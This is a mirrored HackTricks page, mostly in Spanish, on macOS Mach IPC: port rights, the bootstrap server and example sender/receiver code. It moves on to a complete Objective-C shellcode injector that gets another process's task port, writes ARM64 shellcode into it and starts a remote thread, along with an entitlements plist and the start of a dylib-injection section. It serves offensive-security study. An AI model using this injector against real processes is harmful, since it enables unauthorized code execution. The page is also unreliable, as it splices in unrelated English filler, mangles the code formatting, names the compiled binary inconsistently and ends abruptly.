mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-10 12:18:52 +00:00
448 lines
26 KiB
Markdown
448 lines
26 KiB
Markdown
|
# macOS IPC - Inter Process Communication
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><strong>Aprende hacking en AWS desde cero hasta experto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
|
||
|
Otras formas de apoyar a HackTricks:
|
||
|
|
||
|
* Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
||
|
* Obtén el [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
|
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Comparte tus trucos de hacking enviando PRs a** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
||
|
</details>
|
||
|
|
||
|
## Mensajería Mach a través de Puertos
|
||
|
|
||
|
### Información Básica
|
||
|
|
||
|
Mach utiliza **tareas** como la **unidad más pequeña** para compartir recursos, y cada tarea puede contener **múltiples hilos**. Estas **tareas y hilos se mapean en una relación 1:1 con procesos y hilos POSIX**.
|
||
|
|
||
|
La comunicación entre tareas ocurre a través de la Comunicación entre Procesos Mach (IPC), utilizando canales de comunicación unidireccionales. **Los mensajes se transfieren entre puertos**, que actúan como **colas de mensajes** gestionadas por el kernel.
|
||
|
|
||
|
Cada proceso tiene una **tabla IPC**, donde es posible encontrar los **puertos mach del proceso**. El nombre de un puerto mach es en realidad un número (un puntero al objeto del kernel).
|
||
|
|
||
|
Un proceso también puede enviar un nombre de puerto con algunos derechos **a una tarea diferente** y el kernel hará que esta entrada en la **tabla IPC de la otra tarea** aparezca.
|
||
|
|
||
|
### Derechos de Puerto
|
||
|
|
||
|
Los derechos de puerto, que definen qué operaciones puede realizar una tarea, son clave en esta comunicación. Los posibles **derechos de puerto** son ([definiciones desde aquí](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html)):
|
||
|
|
||
|
* **Derecho de Recepción**, que permite recibir mensajes enviados al puerto. Los puertos Mach son colas MPSC (múltiples productores, un solo consumidor), lo que significa que solo puede haber **un derecho de recepción para cada puerto** en todo el sistema (a diferencia de las tuberías, donde varios procesos pueden tener descriptores de archivo al extremo de lectura de una tubería).
|
||
|
* Una **tarea con el Derecho de Recepción** puede recibir mensajes y **crear Derechos de Envío**, lo que le permite enviar mensajes. Originalmente solo la **propia tarea tiene el Derecho de Recepción sobre su puerto**.
|
||
|
* **Derecho de Envío**, que permite enviar mensajes al puerto.
|
||
|
* El Derecho de Envío se puede **clonar** para que una tarea que posee un Derecho de Envío pueda clonar el derecho y **concedérselo a una tercera tarea**.
|
||
|
* **Derecho de Envío-una-vez**, que permite enviar un mensaje al puerto y luego desaparece.
|
||
|
* **Derecho de conjunto de puertos**, que denota un _conjunto de puertos_ en lugar de un solo puerto. Desencolar un mensaje de un conjunto de puertos desencola un mensaje de uno de los puertos que contiene. Los conjuntos de puertos se pueden utilizar para escuchar en varios puertos simultáneamente, de manera similar a `select`/`poll`/`epoll`/`kqueue` en Unix.
|
||
|
* **Nombre muerto**, que no es un derecho de puerto real, sino simplemente un marcador de posición. Cuando se destruye un puerto, todos los derechos de puerto existentes para el puerto se convierten en nombres muertos.
|
||
|
|
||
|
**Las tareas pueden transferir DERECHOS DE ENVÍO a otros**, lo que les permite enviar mensajes de vuelta. **Los DERECHOS DE ENVÍO también se pueden clonar, por lo que una tarea puede duplicar y dar el derecho a una tercera tarea**. Esto, combinado con un proceso intermedio conocido como el **servidor de arranque**, permite una comunicación efectiva entre tareas.
|
||
|
|
||
|
### Puertos de Archivo
|
||
|
|
||
|
Los puertos de archivo permiten encapsular descriptores de archivo en puertos Mac (usando derechos de puerto Mach). Es posible crear un `fileport` a partir de un FD dado usando `fileport_makeport` y crear un FD a partir de un fileport usando `fileport_makefd`.
|
||
|
|
||
|
### Estableciendo una comunicación
|
||
|
|
||
|
#### Pasos:
|
||
|
|
||
|
Como se mencionó, para establecer el canal de comunicación, se involucra el **servidor de arranque** (**launchd** en Mac).
|
||
|
|
||
|
1. La tarea **A** inicia un **nuevo puerto**, obteniendo un **derecho de RECEPCIÓN** en el proceso.
|
||
|
2. La tarea **A**, siendo la titular del derecho de RECEPCIÓN, **genera un derecho de ENVÍO para el puerto**.
|
||
|
3. La tarea **A** establece una **conexión** con el **servidor de arranque**, proporcionando el **nombre del servicio del puerto** y el **derecho de ENVÍO** a través de un procedimiento conocido como el registro de arranque.
|
||
|
4. La tarea **B** interactúa con el **servidor de arranque** para ejecutar una **búsqueda de arranque para el nombre del servicio**. Si tiene éxito, el **servidor duplica el derecho de ENVÍO** recibido de la tarea A y **lo transmite a la tarea B**.
|
||
|
5. Al adquirir un derecho de ENVÍO, la tarea **B** es capaz de **formular** un **mensaje** y enviarlo **a la tarea A**.
|
||
|
6. Para una comunicación bidireccional, generalmente la tarea **B** genera un nuevo puerto con un **derecho de RECEPCIÓN** y un **derecho de ENVÍO**, y le da el **derecho de ENVÍO a la tarea A** para que pueda enviar mensajes a la TAREA B (comunicación bidireccional).
|
||
|
|
||
|
El servidor de arranque **no puede autenticar** el nombre de servicio reclamado por una tarea. Esto significa que una **tarea** podría potencialmente **hacerse pasar por cualquier tarea del sistema**, como **falsamente reclamar un nombre de servicio de autorización** y luego aprobar cada solicitud.
|
||
|
|
||
|
Luego, Apple almacena los **nombres de los servicios proporcionados por el sistema** en archivos de configuración seguros, ubicados en directorios protegidos por SIP: `/System/Library/LaunchDaemons` y `/System/Library/LaunchAgents`. Junto a cada nombre de servicio, también se almacena el **binario asociado**. El servidor de arranque, creará y mantendrá un **derecho de RECEPCIÓN para cada uno de estos nombres de servicio**.
|
||
|
|
||
|
Para estos servicios predefinidos, el **proceso de búsqueda difiere ligeramente**. Cuando se busca un nombre de servicio, launchd inicia el servicio dinámicamente. El nuevo flujo de trabajo es el siguiente:
|
||
|
|
||
|
* La tarea **B** inicia una **búsqueda de arranque** para un nombre de servicio.
|
||
|
* **launchd** verifica si la tarea se está ejecutando y si no lo está, la **inicia**.
|
||
|
* La tarea **A** (el servicio) realiza un **registro de arranque**. Aquí, el **servidor de arranque** crea un derecho de ENVÍO, lo retiene y **transfiere el derecho de RECEPCIÓN a la tarea A**.
|
||
|
* launchd duplica el **derecho de ENVÍO y lo envía a la tarea B**.
|
||
|
* La tarea **B** genera un nuevo puerto con un **derecho de RECEPCIÓN** y un **derecho de ENVÍO**, y le da el **derecho de ENVÍO a la tarea A** (el svc) para que pueda enviar mensajes a la TAREA B (comunicación bidireccional).
|
||
|
|
||
|
Sin embargo, este proceso solo se aplica a las tareas del sistema predefinidas. Las tareas no del sistema aún operan como se describió originalmente, lo que podría permitir potencialmente la suplantación.
|
||
|
|
||
|
### Un Mensaje Mach
|
||
|
|
||
|
[Encuentra más información aquí](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/)
|
||
|
|
||
|
La función `mach_msg`, esencialmente una llamada al sistema, se utiliza para enviar y recibir mensajes Mach. La función requiere que el mensaje se envíe como argumento inicial. Este mensaje debe comenzar con una estructura `mach_msg_header_t`, seguida del contenido real del mensaje. La estructura se define de la siguiente manera:
|
||
|
|
||
|
```c
|
||
|
typedef struct {
|
||
|
mach_msg_bits_t msgh_bits;
|
||
|
mach_msg_size_t msgh_size;
|
||
|
mach_port_t msgh_remote_port;
|
||
|
mach_port_t msgh_local_port;
|
||
|
mach_port_name_t msgh_voucher_port;
|
||
|
mach_msg_id_t msgh_id;
|
||
|
} mach_msg_header_t;
|
||
|
```
|
||
|
|
||
|
Los procesos que poseen un _**derecho de recepción**_ pueden recibir mensajes en un puerto Mach. Por otro lado, los **emisores** reciben un _**derecho de envío**_ o un _**derecho de envío único**_. El derecho de envío único es exclusivamente para enviar un único mensaje, después de lo cual se vuelve inválido.
|
||
|
|
||
|
Para lograr una **comunicación bidireccional** sencilla, un proceso puede especificar un **puerto mach** en el **encabezado del mensaje mach** llamado el _puerto de respuesta_ (**`msgh_local_port`**) donde el **receptor** del mensaje puede **enviar una respuesta** a este mensaje. Los bits de control en **`msgh_bits`** se pueden utilizar para **indicar** que se debe derivar y transferir un **derecho de envío único** para este puerto (`MACH_MSG_TYPE_MAKE_SEND_ONCE`).
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Ten en cuenta que este tipo de comunicación bidireccional se utiliza en mensajes XPC que esperan una respuesta (`xpc_connection_send_message_with_reply` y `xpc_connection_send_message_with_reply_sync`). Pero **generalmente se crean puertos diferentes** como se explicó anteriormente para crear la comunicación bidireccional.
|
||
|
{% endhint %}
|
||
|
|
||
|
Los otros campos del encabezado del mensaje son:
|
||
|
|
||
|
* `msgh_size`: el tamaño del paquete completo.
|
||
|
* `msgh_remote_port`: el puerto al que se envía este mensaje.
|
||
|
* `msgh_voucher_port`: [vales mach](https://robert.sesek.com/2023/6/mach\_vouchers.html).
|
||
|
* `msgh_id`: el ID de este mensaje, que es interpretado por el receptor.
|
||
|
|
||
|
{% hint style="danger" %}
|
||
|
Ten en cuenta que los **mensajes mach se envían a través de un \_puerto mach**\_, que es un canal de comunicación de **un solo receptor**, **múltiples emisores** integrado en el núcleo mach. **Múltiples procesos** pueden **enviar mensajes** a un puerto mach, pero en cualquier momento solo **un proceso puede leer** de él.
|
||
|
{% endhint %}
|
||
|
|
||
|
### Enumerar puertos
|
||
|
|
||
|
```bash
|
||
|
lsmp -p <pid>
|
||
|
```
|
||
|
|
||
|
Puedes instalar esta herramienta en iOS descargándola desde [http://newosxbook.com/tools/binpack64-256.tar.gz](http://newosxbook.com/tools/binpack64-256.tar.gz)
|
||
|
|
||
|
### Ejemplo de código
|
||
|
|
||
|
Observa cómo el **emisor** **asigna** un puerto, crea un **derecho de envío** para el nombre `org.darlinghq.example` y lo envía al **servidor de arranque** mientras que el emisor solicitó el **derecho de envío** de ese nombre y lo usó para **enviar un mensaje**.
|
||
|
|
||
|
```c
|
||
|
// Code from https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html
|
||
|
// gcc receiver.c -o receiver
|
||
|
|
||
|
#include <stdio.h>
|
||
|
#include <mach/mach.h>
|
||
|
#include <servers/bootstrap.h>
|
||
|
|
||
|
int main() {
|
||
|
|
||
|
// Create a new port.
|
||
|
mach_port_t port;
|
||
|
kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
|
||
|
if (kr != KERN_SUCCESS) {
|
||
|
printf("mach_port_allocate() failed with code 0x%x\n", kr);
|
||
|
return 1;
|
||
|
}
|
||
|
printf("mach_port_allocate() created port right name %d\n", port);
|
||
|
|
||
|
|
||
|
// Give us a send right to this port, in addition to the receive right.
|
||
|
kr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
|
||
|
if (kr != KERN_SUCCESS) {
|
||
|
printf("mach_port_insert_right() failed with code 0x%x\n", kr);
|
||
|
return 1;
|
||
|
}
|
||
|
printf("mach_port_insert_right() inserted a send right\n");
|
||
|
|
||
|
|
||
|
// Send the send right to the bootstrap server, so that it can be looked up by other processes.
|
||
|
kr = bootstrap_register(bootstrap_port, "org.darlinghq.example", port);
|
||
|
if (kr != KERN_SUCCESS) {
|
||
|
printf("bootstrap_register() failed with code 0x%x\n", kr);
|
||
|
return 1;
|
||
|
}
|
||
|
printf("bootstrap_register()'ed our port\n");
|
||
|
|
||
|
|
||
|
// Wait for a message.
|
||
|
struct {
|
||
|
mach_msg_header_t header;
|
||
|
char some_text[10];
|
||
|
int some_number;
|
||
|
mach_msg_trailer_t trailer;
|
||
|
} message;
|
||
|
|
||
|
kr = mach_msg(
|
||
|
&message.header, // Same as (mach_msg_header_t *) &message.
|
||
|
MACH_RCV_MSG, // Options. We're receiving a message.
|
||
|
0, // Size of the message being sent, if sending.
|
||
|
sizeof(message), // Size of the buffer for receiving.
|
||
|
port, // The port to receive a message on.
|
||
|
MACH_MSG_TIMEOUT_NONE,
|
||
|
MACH_PORT_NULL // Port for the kernel to send notifications about this message to.
|
||
|
);
|
||
|
if (kr != KERN_SUCCESS) {
|
||
|
printf("mach_msg() failed with code 0x%x\n", kr);
|
||
|
return 1;
|
||
|
}
|
||
|
printf("Got a message\n");
|
||
|
|
||
|
message.some_text[9] = 0;
|
||
|
printf("Text: %s, number: %d\n", message.some_text, message.some_number);
|
||
|
}
|
||
|
```
|
||
|
|
||
|
#### macOS IPC - Comunicación entre Procesos
|
||
|
|
||
|
En macOS, la Comunicación entre Procesos (IPC) se puede lograr a través de mecanismos como **Mach ports** y **XPC services**. Estos mecanismos permiten a los procesos comunicarse entre sí y compartir recursos de manera segura.
|
||
|
|
||
|
**Mach Ports**
|
||
|
|
||
|
Los Mach ports son canales de comunicación unidireccionales que se utilizan para enviar mensajes entre procesos en macOS. Cada puerto Mach tiene un identificador único y se puede utilizar para enviar mensajes y notificaciones entre procesos.
|
||
|
|
||
|
**XPC Services**
|
||
|
|
||
|
Los XPC services son servicios ligeros que se ejecutan en segundo plano y permiten a las aplicaciones comunicarse de forma segura con procesos externos. Estos servicios se utilizan comúnmente para tareas que requieren privilegios elevados, como la instalación de software o la gestión de dispositivos.
|
||
|
|
||
|
En resumen, la IPC en macOS es fundamental para que los procesos se comuniquen de manera segura y eficiente, lo que permite una mejor integración entre las aplicaciones y el sistema operativo.
|
||
|
|
||
|
```c
|
||
|
// Code from https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html
|
||
|
// gcc sender.c -o sender
|
||
|
|
||
|
#include <stdio.h>
|
||
|
#include <mach/mach.h>
|
||
|
#include <servers/bootstrap.h>
|
||
|
|
||
|
int main() {
|
||
|
|
||
|
// Lookup the receiver port using the bootstrap server.
|
||
|
mach_port_t port;
|
||
|
kern_return_t kr = bootstrap_look_up(bootstrap_port, "org.darlinghq.example", &port);
|
||
|
if (kr != KERN_SUCCESS) {
|
||
|
printf("bootstrap_look_up() failed with code 0x%x\n", kr);
|
||
|
return 1;
|
||
|
}
|
||
|
printf("bootstrap_look_up() returned port right name %d\n", port);
|
||
|
|
||
|
|
||
|
// Construct our message.
|
||
|
struct {
|
||
|
mach_msg_header_t header;
|
||
|
char some_text[10];
|
||
|
int some_number;
|
||
|
} message;
|
||
|
|
||
|
message.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
|
||
|
message.header.msgh_remote_port = port;
|
||
|
message.header.msgh_local_port = MACH_PORT_NULL;
|
||
|
|
||
|
strncpy(message.some_text, "Hello", sizeof(message.some_text));
|
||
|
message.some_number = 35;
|
||
|
|
||
|
// Send the message.
|
||
|
kr = mach_msg(
|
||
|
&message.header, // Same as (mach_msg_header_t *) &message.
|
||
|
MACH_SEND_MSG, // Options. We're sending a message.
|
||
|
sizeof(message), // Size of the message being sent.
|
||
|
0, // Size of the buffer for receiving.
|
||
|
MACH_PORT_NULL, // A port to receive a message on, if receiving.
|
||
|
MACH_MSG_TIMEOUT_NONE,
|
||
|
MACH_PORT_NULL // Port for the kernel to send notifications about this message to.
|
||
|
);
|
||
|
if (kr != KERN_SUCCESS) {
|
||
|
printf("mach_msg() failed with code 0x%x\n", kr);
|
||
|
return 1;
|
||
|
}
|
||
|
printf("Sent a message\n");
|
||
|
}
|
||
|
```
|
||
|
|
||
|
### Puertos privilegiados
|
||
|
|
||
|
* **Puerto del host**: Si un proceso tiene el privilegio de **Enviar** sobre este puerto, puede obtener **información** sobre el **sistema** (por ejemplo, `host_processor_info`).
|
||
|
* **Puerto de privilegio del host**: Un proceso con el derecho de **Enviar** sobre este puerto puede realizar **acciones privilegiadas** como cargar una extensión del kernel. El **proceso necesita ser root** para obtener este permiso.
|
||
|
* Además, para llamar a la API **`kext_request`** se necesitan otros permisos **`com.apple.private.kext*`** que solo se otorgan a binarios de Apple.
|
||
|
* **Puerto del nombre de la tarea**: Una versión no privilegiada del _puerto de la tarea_. Hace referencia a la tarea, pero no permite controlarla. Lo único que parece estar disponible a través de él es `task_info()`.
|
||
|
* **Puerto de la tarea** (también conocido como puerto del kernel)**:** Con permiso de Envío sobre este puerto es posible controlar la tarea (leer/escribir memoria, crear hilos...).
|
||
|
* Llame a `mach_task_self()` para **obtener el nombre** de este puerto para la tarea del llamante. Este puerto solo se **hereda** a través de **`exec()`**; una nueva tarea creada con `fork()` obtiene un nuevo puerto de tarea (como caso especial, una tarea también obtiene un nuevo puerto de tarea después de `exec()` en un binario suid). La única forma de generar una tarea y obtener su puerto es realizar la ["danza de intercambio de puertos"](https://robert.sesek.com/2014/1/changes\_to\_xnu\_mach\_ipc.html) mientras se realiza un `fork()`.
|
||
|
* Estas son las restricciones para acceder al puerto (desde `macos_task_policy` del binario `AppleMobileFileIntegrity`):
|
||
|
* Si la aplicación tiene el permiso de **`com.apple.security.get-task-allow`**, los procesos del **mismo usuario pueden acceder al puerto de la tarea** (comúnmente agregado por Xcode para depurar). El proceso de **notarización** no lo permitirá en versiones de producción.
|
||
|
* Las aplicaciones con el permiso **`com.apple.system-task-ports`** pueden obtener el **puerto de la tarea de cualquier** proceso, excepto el del kernel. En versiones anteriores se llamaba **`task_for_pid-allow`**. Esto solo se otorga a aplicaciones de Apple.
|
||
|
* **Root puede acceder a los puertos de tarea** de aplicaciones **no** compiladas con un tiempo de ejecución **fortificado** (y no de Apple).
|
||
|
|
||
|
### Inyección de shellcode en un hilo a través del puerto de la tarea
|
||
|
|
||
|
Puedes obtener un shellcode desde:
|
||
|
|
||
|
{% content-ref url="../../macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
|
||
|
[arm64-basic-assembly.md](../../macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
||
|
{% endcontent-ref %}
|
||
|
|
||
|
```objectivec
|
||
|
// clang -framework Foundation mysleep.m -o mysleep
|
||
|
// codesign --entitlements entitlements.plist -s - mysleep
|
||
|
|
||
|
#import <Foundation/Foundation.h>
|
||
|
|
||
|
double performMathOperations() {
|
||
|
double result = 0;
|
||
|
for (int i = 0; i < 10000; i++) {
|
||
|
result += sqrt(i) * tan(i) - cos(i);
|
||
|
}
|
||
|
return result;
|
||
|
}
|
||
|
|
||
|
int main(int argc, const char * argv[]) {
|
||
|
@autoreleasepool {
|
||
|
NSLog(@"Process ID: %d", [[NSProcessInfo processInfo]
|
||
|
processIdentifier]);
|
||
|
while (true) {
|
||
|
[NSThread sleepForTimeInterval:5];
|
||
|
|
||
|
performMathOperations(); // Silent action
|
||
|
|
||
|
[NSThread sleepForTimeInterval:5];
|
||
|
}
|
||
|
}
|
||
|
return 0;
|
||
|
}
|
||
|
```
|
||
|
|
||
|
#### macOS IPC (Inter-Process Communication)
|
||
|
|
||
|
**macOS IPC Mechanisms**
|
||
|
|
||
|
macOS provides several mechanisms for inter-process communication (IPC), including:
|
||
|
|
||
|
* **Mach Messages**: Low-level messaging system used by the kernel and other system services.
|
||
|
* **XPC Services**: High-level API for creating and managing inter-process communication.
|
||
|
* **Distributed Objects**: Framework for distributed computing using Objective-C objects.
|
||
|
* **Apple Events**: Inter-application communication mechanism based on events and scripting.
|
||
|
|
||
|
**IPC Security Considerations**
|
||
|
|
||
|
When designing macOS applications that use IPC, consider the following security best practices:
|
||
|
|
||
|
* **Use Secure Communication**: Encrypt sensitive data transmitted via IPC mechanisms.
|
||
|
* **Validate Input**: Sanitize and validate input received through IPC to prevent injection attacks.
|
||
|
* **Implement Access Controls**: Use entitlements and permissions to control access to IPC interfaces.
|
||
|
* **Avoid Trusting External Data**: Do not trust data received through IPC channels without validation.
|
||
|
* **Monitor IPC Activity**: Implement logging and monitoring of IPC interactions for security analysis.
|
||
|
|
||
|
By following these best practices, developers can enhance the security of macOS applications that rely on inter-process communication.
|
||
|
|
||
|
```xml
|
||
|
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
|
||
|
<plist version="1.0">
|
||
|
<dict>
|
||
|
<key>com.apple.security.get-task-allow</key>
|
||
|
<true/>
|
||
|
</dict>
|
||
|
</plist>
|
||
|
```
|
||
|
|
||
|
**Compila** el programa anterior y agrega los **permisos** necesarios para poder inyectar código con el mismo usuario (de lo contrario, necesitarás usar **sudo**).
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>sc_injector.m</summary>
|
||
|
|
||
|
\`\`\`objectivec // gcc -framework Foundation -framework Appkit sc\_injector.m -o sc\_injector
|
||
|
|
||
|
\#import \<Foundation/Foundation.h> #import \<AppKit/AppKit.h> #include \<mach/mach\_vm.h> #include \<sys/sysctl.h>
|
||
|
|
||
|
\#ifdef **arm64**
|
||
|
|
||
|
kern\_return\_t mach\_vm\_allocate ( vm\_map\_t target, mach\_vm\_address\_t \*address, mach\_vm\_size\_t size, int flags );
|
||
|
|
||
|
kern\_return\_t mach\_vm\_write ( vm\_map\_t target\_task, mach\_vm\_address\_t address, vm\_offset\_t data, mach\_msg\_type\_number\_t dataCnt );
|
||
|
|
||
|
\#else #include \<mach/mach\_vm.h> #endif
|
||
|
|
||
|
\#define STACK\_SIZE 65536 #define CODE\_SIZE 128
|
||
|
|
||
|
// ARM64 shellcode that executes touch /tmp/lalala char injectedCode\[] = "\xff\x03\x01\xd1\xe1\x03\x00\x91\x60\x01\x00\x10\x20\x00\x00\xf9\x60\x01\x00\x10\x20\x04\x00\xf9\x40\x01\x00\x10\x20\x08\x00\xf9\x3f\x0c\x00\xf9\x80\x00\x00\x10\xe2\x03\x1f\xaa\x70\x07\x80\xd2\x01\x00\x00\xd4\x2f\x62\x69\x6e\x2f\x73\x68\x00\x2d\x63\x00\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x6c\x61\x6c\x61\x6c\x61\x00";
|
||
|
|
||
|
int inject(pid\_t pid){
|
||
|
|
||
|
task\_t remoteTask;
|
||
|
|
||
|
// Get access to the task port of the process we want to inject into kern\_return\_t kr = task\_for\_pid(mach\_task\_self(), pid, \&remoteTask); if (kr != KERN\_SUCCESS) { fprintf (stderr, "Unable to call task\_for\_pid on pid %d: %d. Cannot continue!\n",pid, kr); return (-1); } else{ printf("Gathered privileges over the task port of process: %d\n", pid); }
|
||
|
|
||
|
// Allocate memory for the stack mach\_vm\_address\_t remoteStack64 = (vm\_address\_t) NULL; mach\_vm\_address\_t remoteCode64 = (vm\_address\_t) NULL; kr = mach\_vm\_allocate(remoteTask, \&remoteStack64, STACK\_SIZE, VM\_FLAGS\_ANYWHERE);
|
||
|
|
||
|
if (kr != KERN\_SUCCESS) { fprintf(stderr,"Unable to allocate memory for remote stack in thread: Error %s\n", mach\_error\_string(kr)); return (-2); } else {
|
||
|
|
||
|
fprintf (stderr, "Allocated remote stack @0x%llx\n", remoteStack64); }
|
||
|
|
||
|
// Allocate memory for the code remoteCode64 = (vm\_address\_t) NULL; kr = mach\_vm\_allocate( remoteTask, \&remoteCode64, CODE\_SIZE, VM\_FLAGS\_ANYWHERE );
|
||
|
|
||
|
if (kr != KERN\_SUCCESS) { fprintf(stderr,"Unable to allocate memory for remote code in thread: Error %s\n", mach\_error\_string(kr)); return (-2); }
|
||
|
|
||
|
// Write the shellcode to the allocated memory kr = mach\_vm\_write(remoteTask, // Task port remoteCode64, // Virtual Address (Destination) (vm\_address\_t) injectedCode, // Source 0xa9); // Length of the source
|
||
|
|
||
|
if (kr != KERN\_SUCCESS) { fprintf(stderr,"Unable to write remote thread memory: Error %s\n", mach\_error\_string(kr)); return (-3); }
|
||
|
|
||
|
// Set the permissions on the allocated code memory kr = vm\_protect(remoteTask, remoteCode64, 0x70, FALSE, VM\_PROT\_READ | VM\_PROT\_EXECUTE);
|
||
|
|
||
|
if (kr != KERN\_SUCCESS) { fprintf(stderr,"Unable to set memory permissions for remote thread's code: Error %s\n", mach\_error\_string(kr)); return (-4); }
|
||
|
|
||
|
// Set the permissions on the allocated stack memory kr = vm\_protect(remoteTask, remoteStack64, STACK\_SIZE, TRUE, VM\_PROT\_READ | VM\_PROT\_WRITE);
|
||
|
|
||
|
if (kr != KERN\_SUCCESS) { fprintf(stderr,"Unable to set memory permissions for remote thread's stack: Error %s\n", mach\_error\_string(kr)); return (-4); }
|
||
|
|
||
|
// Create thread to run shellcode struct arm\_unified\_thread\_state remoteThreadState64; thread\_act\_t remoteThread;
|
||
|
|
||
|
memset(\&remoteThreadState64, '\0', sizeof(remoteThreadState64) );
|
||
|
|
||
|
remoteStack64 += (STACK\_SIZE / 2); // this is the real stack //remoteStack64 -= 8; // need alignment of 16
|
||
|
|
||
|
const char\* p = (const char\*) remoteCode64;
|
||
|
|
||
|
remoteThreadState64.ash.flavor = ARM\_THREAD\_STATE64; remoteThreadState64.ash.count = ARM\_THREAD\_STATE64\_COUNT; remoteThreadState64.ts\_64.\_\_pc = (u\_int64\_t) remoteCode64; remoteThreadState64.ts\_64.\_\_sp = (u\_int64\_t) remoteStack64;
|
||
|
|
||
|
printf ("Remote Stack 64 0x%llx, Remote code is %p\n", remoteStack64, p );
|
||
|
|
||
|
kr = thread\_create\_running(remoteTask, ARM\_THREAD\_STATE64, // ARM\_THREAD\_STATE64, (thread\_state\_t) \&remoteThreadState64.ts\_64, ARM\_THREAD\_STATE64\_COUNT , \&remoteThread );
|
||
|
|
||
|
if (kr != KERN\_SUCCESS) { fprintf(stderr,"Unable to create remote thread: error %s", mach\_error\_string (kr)); return (-3); }
|
||
|
|
||
|
return (0); }
|
||
|
|
||
|
pid\_t pidForProcessName(NSString \*processName) { NSArray \*arguments = @\[@"pgrep", processName]; NSTask \*task = \[\[NSTask alloc] init]; \[task setLaunchPath:@"/usr/bin/env"]; \[task setArguments:arguments];
|
||
|
|
||
|
NSPipe \*pipe = \[NSPipe pipe]; \[task setStandardOutput:pipe];
|
||
|
|
||
|
NSFileHandle \*file = \[pipe fileHandleForReading];
|
||
|
|
||
|
\[task launch];
|
||
|
|
||
|
NSData \*data = \[file readDataToEndOfFile]; NSString \*string = \[\[NSString alloc] initWithData:data encoding:NSUTF8StringEncoding];
|
||
|
|
||
|
return (pid\_t)\[string integerValue]; }
|
||
|
|
||
|
BOOL isStringNumeric(NSString _str) { NSCharacterSet_ nonNumbers = \[\[NSCharacterSet decimalDigitCharacterSet] invertedSet]; NSRange r = \[str rangeOfCharacterFromSet: nonNumbers]; return r.location == NSNotFound; }
|
||
|
|
||
|
int main(int argc, const char \* argv\[]) { @autoreleasepool { if (argc < 2) { NSLog(@"Usage: %s ", argv\[0]); return 1; }
|
||
|
|
||
|
NSString \*arg = \[NSString stringWithUTF8String:argv\[1]]; pid\_t pid;
|
||
|
|
||
|
if (isStringNumeric(arg)) { pid = \[arg intValue]; } else { pid = pidForProcessName(arg); if (pid == 0) { NSLog(@"Error: Process named '%@' not found.", arg); return 1; } else{ printf("Found PID of process '%s': %d\n", \[arg UTF8String], pid); } }
|
||
|
|
||
|
inject(pid); }
|
||
|
|
||
|
return 0; }
|
||
|
|
||
|
````
|
||
|
</details>
|
||
|
```bash
|
||
|
gcc -framework Foundation -framework Appkit sc_inject.m -o sc_inject
|
||
|
./inject <pi or string>
|
||
|
````
|
||
|
|
||
|
#### Inyección de Dylib en hilo a través del puerto de Tarea
|
||
|
|
||
|
En macOS, los **hilos** pueden ser manipulados a través de **Mach** o utilizando la **API posix `pthread`**. El hilo que generamos en la inyección anterior fue generado utilizando la API de Mach, por lo que **no es compatible con posix**.
|
||
|
|
||
|
Fue posible **inyectar un shellcode simple** para ejecutar un comando porque **no era necesario trabajar con APIs compatibles con posix**, solo con Mach. **Inyecciones más complejas** necesitarían que el **hilo** también sea **compatible con posix**.
|
||
|
|
||
|
Por lo tanto, para **mejorar el hilo**, se debe llamar a **`pthread_create_from_mach_thread`** que creará un pthread válido. Luego, este nuevo pthread podría **llamar a dlopen** para **cargar una dylib** del sistema, por lo que en lugar de escribir nuevo shellcode para realizar diferentes acciones, es posible cargar bibliotecas personalizadas.
|
||
|
|
||
|
Puedes encontrar **ejemplos de dylibs** en (por ejemplo, uno que genere un registro y luego puedas escucharlo):
|
||
|
|
||
|
</details>
|